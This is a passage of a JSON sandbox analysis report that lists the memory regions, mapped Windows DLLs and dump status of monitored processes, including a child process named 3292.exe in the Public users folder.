[ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 12128255, "entry_point": 0, "filename": null, "id": "region_1129", "name": "pagefile_0x0000000000a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10551296, "timestamp": "00:00:29.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1130", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:00:29.398", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001131-addr_0x00000000021d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35520511, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:00:29.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 38465535, "entry_point": 35520512, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1132", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35520512, "timestamp": "00:00:29.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952776192, "type": "region", "version": 1 }, "end_va": 1953300479, "entry_point": 1952776192, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1133", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952776192, "timestamp": "00:00:29.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001134-addr_0x00000000024b0000-size_0x0000000000220000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2228224, "start_va": 38469632, "type": "region", "version": 1 }, "end_va": 40697855, "entry_point": 0, "filename": null, "id": "region_1134", "name": "private_0x00000000024b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38469632, "timestamp": "00:00:29.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3469311, "entry_point": 0, "filename": null, "id": "region_1135", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:00:29.416", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001136-addr_0x00000000000e0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:29.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001137-addr_0x0000000000100000-size_0x000000000000e000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1105919, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:29.468", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001138-addr_0x00000000026d0000-size_0x00000000003d1000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4001792, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 44699647, "entry_point": 0, "filename": null, "id": "region_1138", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:00:29.472", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001141-addr_0x0000000000110000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1171455, "entry_point": 0, "filename": null, "id": "region_1141", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:30.259", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001142-addr_0x0000000000120000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:30.259", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001143-addr_0x0000000000460000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:00:30.259", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\Public\\3292.exe\"", "filename": "c:\\users\\public\\3292.exe", "id": "proc_5", "image_name": "3292.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00001144-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1144", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:31.426", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001145-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:31.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1146", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:31.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1147", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:31.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1148", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:31.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001149-addr_0x0000000000230000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1149", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:31.430", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001150-addr_0x00000000002c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1150", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:31.430", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001151-addr_0x0000000000be0000-size_0x000000000001f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1151", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:00:31.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1152", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:31.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1153", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:00:31.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1154", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:31.431", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001155-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:31.432", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001156-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:31.432", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001157-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:31.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:31.432", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001159-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1159", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:31.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1160", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:31.433", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001161-addr_0x0000000000550000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1161", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:31.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1162", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:31.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1163", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:00:31.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1164", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:31.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1165", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:31.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1166", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:31.457", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001167-addr_0x0000000000120000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1167", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:31.458", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001168-addr_0x0000000000760000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 0, "filename": null, "id": "region_1168", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:31.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954877439, "entry_point": 1954715788, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_1169", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:31.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955143679, "entry_point": 1954953201, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_1170", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:00:31.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1955201024, "type": "region", "version": 1 }, "end_va": 1955282943, "entry_point": 1955205952, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_1171", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1955201024, "timestamp": "00:00:31.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1172", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:31.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1173", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1174", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:00:31.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1175", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:00:31.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1176", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:00:31.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1177", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:00:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1178", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:00:31.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1179", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:00:31.463", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1180", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:31.463", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1181", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:00:31.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1182", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:31.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1183", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:31.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1184", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:00:31.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991655345, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1185", "name": "oleaut32.dll", "norm_filename": 